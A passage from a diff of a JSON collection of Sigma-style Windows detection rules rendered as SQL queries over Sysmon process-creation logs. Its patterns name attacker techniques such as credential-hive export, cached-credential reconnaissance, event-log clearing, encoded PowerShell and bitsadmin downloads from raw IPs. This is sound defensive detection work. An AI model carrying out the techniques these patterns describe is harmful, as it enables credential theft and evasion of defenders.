NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": 
"proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", - "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "status": "test", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { "title": "Potential Windows Defender Tampering Via Wmic.EXE", 
@@ -7508,765 +7293,738 @@ "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' 
ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. 
This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "Legitimate software creating script event consumers" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + }, + { + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1543.003" + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "description": "Detects the use of SDelete to erase a file not the free space", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE 
'\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN 
('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", - "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Administrative script libraries" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", "attack.persistence", - "attack.privilege_escalation" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE 
'%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "status": "experimental", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows 
Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", + "status": "test", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "author": "Florian Roth (Nextron Systems)", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR 
OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE 
'%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": 
"proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "status": "experimental", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 